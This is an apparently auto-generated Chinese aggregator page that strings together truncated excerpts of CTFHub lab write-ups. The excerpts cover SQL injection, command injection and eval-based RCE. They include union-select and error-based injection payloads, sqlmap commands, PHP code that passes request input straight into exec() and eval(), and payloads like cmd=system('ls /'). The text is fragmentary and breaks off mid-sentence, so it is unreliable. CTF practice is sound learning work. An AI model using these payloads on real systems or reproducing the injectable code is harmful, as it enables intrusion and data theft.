CTFHub-easy_search】的更多相关文章

今天在ctfhub整理了几个sql注入的解题过程,还算是比较详细的. 知识点都是比较常见的:每个题大致涉及的知识点用一张表格解释 !注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema库下的表 如:schemata.tables等,不作特殊说明的都指information库下的数据表 还有此处的题是ctfhub整合好的,所以所有的数据库和表包括字段名都一样,不要偷懒. 关键字/语句/函数 解释 union select 联合查…
在一个大佬的突然丢了个题过来,于是去玩了玩rce的两道题 大佬的博客跳转链接在此->>>大佬召唤机 叫 命令注入 一上来就是源码出现,上面有个ping的地方 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <…
Web HTTP协议 请求方式…
payload   1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; payload拆分讲解  1 count():count()函数返回匹配指定条件的行数.count(*)函数返回表中的记录数 2 floor():floor:函数是用来向下取整呢个的,相当于去掉小数部分 3 rand():rand()是随机取(0,1)中的一个数,但是…
整数型注入 手工注入 1.查看是否存在sql注入,及sql注入类型 2.确定列数 3.确定注入点,以及数据库版本,数据库名称 4.查表名 5.查字段名以及flag值 获得flag值 sqlmap做法 查库 sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 --dbs 查表 sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhu…
Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20order%20by%202 字段数为2 ?id=1%20and%201=2%20union%20select%201,2 1,2位置都回显,查表名 ?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20inform…
今天CTFHub正式上线了,https://www.ctfhub.com/#/index,之前有看到这个平台,不过没在上面做题,技能树还是很新颖的,不足的是有的方向的题目还没有题目,CTF比赛时间显示也挺好的,这样就不用担心错过比赛了. 先做签到题,访问博客就可以拿到. Web前置技能, 可以看到大部分题目都还没有补充完成. HTTP协议第一题:请求方式 一般来说我们比较常用的是GET和POST方法 开启题目 可以看到是需要我们使用CTFHUB方法访问该网址,burpsuite里面修改请求方法好…
数据库类流量: MySQL流量: 1.下载附件,是一个.pcap文件,用wireshark分析, 2.搜索ctfhub字段,即可得到flag, flag: ctfhub{mysql_is_S0_E4sy} Redis流量: 1.下载附件,是一个.pcap文件,用wireshark分析, 2.搜索ctfhub字段,发现flag只有一部分, 3.接着第66个字符接着往后找, 4.在第70个找到后半部分flag, flag: ctfhub{6051d6123de43dfad7609804925c012…
命令注入: 1.进入页面,测试127.0.0.1, 关键代码: <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { print_r($res);// 打印结果 } show_source(_…
eval执行: 1.进入网页,显示源码, <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 2.输入命令,发现该文件并不是想要的, cmd=system("ls"); 3.继续查看目录命令, cmd=system("ls /"); 4.查看,得到flag, cmd=system(&qu…